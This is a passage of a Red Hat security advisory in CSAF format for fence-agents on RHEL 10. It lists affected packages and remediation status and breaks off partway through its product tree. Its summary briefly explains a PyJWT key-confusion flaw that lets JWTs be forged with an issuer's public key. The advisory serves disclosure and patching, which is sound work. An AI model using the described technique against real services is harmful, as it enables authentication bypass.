RHSA-2026:25902
Vulnerability from csaf_redhat - Published: 2026-06-15 02:41 - Updated: 2026-06-16 21:43A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer's public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.2.Z:fence-agents-0:4.16.0-21.el10_2.2.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-aliyun-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-amt-ws-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-apc-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-apc-snmp-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-aws-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-azure-arm-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-bladecenter-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-brocade-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-cisco-mds-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-cisco-ucs-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-common-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-drac5-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-eaton-snmp-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-emerson-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-eps-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-gce-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-heuristics-ping-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-hpblade-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-ibm-powervs-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-ibm-vpc-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-ibmblade-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-ifmib-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-ilo-moonshot-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-ilo-mp-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-ilo-ssh-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-ilo2-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-intelmodular-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-ipdu-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-ipmilan-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-lpar-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-mpath-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-nutanix-ahv-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-openstack-0:4.16.0-21.el10_2.2.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-openstack-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-rhevm-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-rsa-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-rsb-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-sbd-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-scsi-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-virsh-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-vmware-rest-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-vmware-soap-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-wti-0:4.16.0-21.el10_2.2.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-agents-zvm-0:4.16.0-21.el10_2.2.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virt-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virt-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-cpg-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-cpg-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-libvirt-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-libvirt-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-multicast-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-multicast-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-serial-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-serial-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-tcp-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:fence-virtd-tcp-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:ha-cloud-support-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.2.Z:ha-cloud-support-debuginfo-0:4.16.0-21.el10_2.2.x86_64 | — |
Vendor Fix
fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for fence-agents is now available for Red Hat Enterprise Linux 10.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. \n\nSecurity Fix(es):\n\n* python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens (CVE-2026-48526)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:25902",
"url": "https://access.redhat.com/errata/RHSA-2026:25902"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_25902.json"
}
],
"title": "Red Hat Security Advisory: fence-agents security update",
"tracking": {
"current_release_date": "2026-06-16T21:43:18+00:00",
"generator": {
"date": "2026-06-16T21:43:18+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.0.0"
}
},
"id": "RHSA-2026:25902",
"initial_release_date": "2026-06-15T02:41:20+00:00",
"revision_history": [
{
"date": "2026-06-15T02:41:20+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-15T02:41:20+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-16T21:43:18+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.2"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-0:4.16.0-21.el10_2.2.src",
"product": {
"name": "fence-agents-0:4.16.0-21.el10_2.2.src",
"product_id": "fence-agents-0:4.16.0-21.el10_2.2.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents@4.16.0-21.el10_2.2?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-aliyun-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-aliyun-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-aliyun-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-aliyun@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-all-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-all@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-aws-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-aws-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-aws-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-aws@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-azure-arm-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-azure-arm-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-azure-arm-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-azure-arm@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-common-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-common@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-gce-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-gce-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-gce-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-gce@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-kdump-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-openstack-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-openstack-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-openstack-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-openstack@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-redfish-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-redfish@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virt-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virt-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virt-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virt@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-cpg-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-cpg-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-cpg-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-cpg@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-libvirt-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-libvirt-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-libvirt-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-libvirt@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-multicast-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-multicast-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-multicast-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-multicast@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-serial-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-serial-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-serial-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-serial@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-tcp-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-tcp-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-tcp-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-tcp@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ha-cloud-support-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "ha-cloud-support-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "ha-cloud-support-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ha-cloud-support@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debugsource@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-common-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virt-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-cpg-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-cpg-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-cpg-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-cpg-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-libvirt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-libvirt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-libvirt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-libvirt-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-multicast-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-multicast-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-multicast-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-multicast-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-serial-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-serial-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-serial-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-serial-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-tcp-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "fence-virtd-tcp-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_id": "fence-virtd-tcp-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-tcp-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ha-cloud-support-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product": {
"name": "ha-cloud-support-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
